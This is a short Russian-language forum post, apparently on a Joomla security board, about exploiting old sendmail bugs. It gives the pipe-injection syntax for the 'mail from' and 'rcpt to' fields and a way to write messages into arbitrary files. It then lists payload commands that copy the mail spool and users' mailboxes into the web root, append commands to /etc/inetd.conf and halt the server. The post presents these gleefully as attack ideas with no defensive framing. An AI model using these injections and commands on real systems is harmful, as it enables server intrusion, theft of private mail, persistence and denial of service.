Про взлом сайтов... Вопрос по SENDMAIL... - Безопасность сайтов на Joomla

Радость в том ,что , зачастую, в sendmail есть следующие баги  :( :(:
1. mail from : sendername|any_command_as_U_want  - возможность выполнения любой UNIX команды
rcpt to : username|any_command_as_U_want - возможность выполнения любой UNIX команды
2. rcpt to : /any_directory/any_filename - возможность направить мессагу напрямую в файл)))
Один гражданин ,назвавший себя VIRUSMAN недавно прислал письмо где был следующий вопрос:
"А что мне это дает?" Ну что я могу сказать .........
В первом случае можно сделать нечто типа:
/bin/ls /var/spool/mail>/home/httpd/html/users_info.txt - получаем список почтовых юзерей
/bin/cat /var/spool/mail/username>/home/httpd/html/user_box.txt - получаем контент ящика юзера.
/bin/echo any_commands_here>>/etc/inetd.conf - добавляем произвольные команды в конец инет демона)).
/sbin/halt - паркуем сервак))) и т.д....

Во втором случае ...)))
Ну попробуй подумать, пиши что хочешь и куда хочешь))) Можно дописать произвольные команды скажем в /etc/inetd.conf ... все зависит от твоей фантазии.